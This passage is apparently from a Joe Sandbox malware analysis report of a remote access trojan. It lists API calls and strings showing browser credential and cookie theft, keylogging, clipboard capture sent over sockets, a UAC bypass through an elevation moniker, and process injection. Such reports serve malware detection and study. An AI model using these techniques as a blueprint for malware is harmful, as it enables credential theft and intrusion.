                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 1164774033-3681987949
                                        • Opcode ID: 16969a060028ea01768b3e7f8d1dd51863cff663cb6b33d182e29f9985d51af6
                                        • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                        • Opcode Fuzzy Hash: 16969a060028ea01768b3e7f8d1dd51863cff663cb6b33d182e29f9985d51af6
                                        • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                        • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                        • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                        • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$File$FirstNext
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 3527384056-432212279
                                        • Opcode ID: a9a1d2a1cd8360742623f5947b655a78589cbc9ba895ac191cc005815f72155e
                                        • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                        • Opcode Fuzzy Hash: a9a1d2a1cd8360742623f5947b655a78589cbc9ba895ac191cc005815f72155e
                                        • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                          • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                        • API String ID: 726551946-3025026198
                                        • Opcode ID: dc1ad798a35d7444bbbbf078d0d444fc3737f63c90b642ee01f5359e624c1f46
                                        • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                        • Opcode Fuzzy Hash: dc1ad798a35d7444bbbbf078d0d444fc3737f63c90b642ee01f5359e624c1f46
                                        • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                        APIs
                                        • OpenClipboard.USER32 ref: 004159C7
                                        • EmptyClipboard.USER32 ref: 004159D5
                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                        • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                        • CloseClipboard.USER32 ref: 00415A5A
                                        • OpenClipboard.USER32 ref: 00415A61
                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                        • CloseClipboard.USER32 ref: 00415A89
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                        • String ID:
                                        • API String ID: 3520204547-0
                                        • Opcode ID: 115af58ca25ac982801086cc968099495571ae34f6290ed4f1dd44d177635a22
                                        • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                        • Opcode Fuzzy Hash: 115af58ca25ac982801086cc968099495571ae34f6290ed4f1dd44d177635a22
                                        • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0$1$2$3$4$5$6$7
                                        • API String ID: 0-3177665633
                                        • Opcode ID: 749f6a55d273af1ff276c8e2e6441e457c328e07a3b13567bd2426039e935f4e
                                        • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                        • Opcode Fuzzy Hash: 749f6a55d273af1ff276c8e2e6441e457c328e07a3b13567bd2426039e935f4e
                                        • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                        • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                        • GetKeyState.USER32(00000010), ref: 00409B5C
                                        • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                        • ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                        • String ID: X[G
                                        • API String ID: 1888522110-739899062
                                        • Opcode ID: 6b40a38aeadb85bfb73805397b44a8e398a18fbf7f02f723f5f91e0a6223020d
                                        • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                        • Opcode Fuzzy Hash: 6b40a38aeadb85bfb73805397b44a8e398a18fbf7f02f723f5f91e0a6223020d
                                        • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                        APIs
                                        • _wcslen.LIBCMT ref: 00406788
                                        • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Object_wcslen
                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                        • API String ID: 240030777-3166923314
                                        • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                        • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                        • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                        • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                        APIs
                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                        • GetLastError.KERNEL32 ref: 00419945
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                        • String ID:
                                        • API String ID: 3587775597-0
                                        • Opcode ID: 3890bdb0540eb0e670ed260973a12fdff1d758257f1b422d234bde2ff04c0bf6
                                        • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                        • Opcode Fuzzy Hash: 3890bdb0540eb0e670ed260973a12fdff1d758257f1b422d234bde2ff04c0bf6
                                        • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 2341273852-0
                                        • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                        • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                        • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                        • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                        • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                        • API String ID: 2127411465-314212984
                                        • Opcode ID: e40e0e492563d2c27dc049d7b387231c440f41e8a0c0508c2b9921386633d4df
                                        • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                        • Opcode Fuzzy Hash: e40e0e492563d2c27dc049d7b387231c440f41e8a0c0508c2b9921386633d4df
                                        • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                        • GetLastError.KERNEL32 ref: 0040B261
                                        Strings
                                        • [Chrome StoredLogins not found], xrefs: 0040B27B
                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                        • UserProfile, xrefs: 0040B227
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 2018770650-1062637481
                                        • Opcode ID: 6231a6ec8c0bf8e98c8684e8dd9bafedce4a0939dadfa85d19fb30db5e755b14
                                        • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                        • Opcode Fuzzy Hash: 6231a6ec8c0bf8e98c8684e8dd9bafedce4a0939dadfa85d19fb30db5e755b14
                                        • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                        • GetLastError.KERNEL32 ref: 00416B02
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                        • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                        • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                        • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: c9c150e801306c30e3e6fd676bf91ab99d53cd06d8b99a70f0bcb8a83e562639
                                        • Instruction ID: e307a384b629b95ff6fef94050d5be06a037bb5012f5a6d22b447047531b26ff
                                        • Opcode Fuzzy Hash: c9c150e801306c30e3e6fd676bf91ab99d53cd06d8b99a70f0bcb8a83e562639
                                        • Instruction Fuzzy Hash: 1FC27071E046288FDB25CE28CD447EAB3B5EB44346F1441EBD84DE7242E778AE898F45
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 004089AE
                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000328,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                          • Part of subcall function 00404468: SetEvent.KERNEL32(00000328,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                          • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                          • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                          • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                        • String ID:
                                        • API String ID: 4043647387-0
                                        • Opcode ID: b6d780576700f4933a9aaca3c1beff4f868690156509575001d11b963eafbbf9
                                        • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                        • Opcode Fuzzy Hash: b6d780576700f4933a9aaca3c1beff4f868690156509575001d11b963eafbbf9
                                        • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
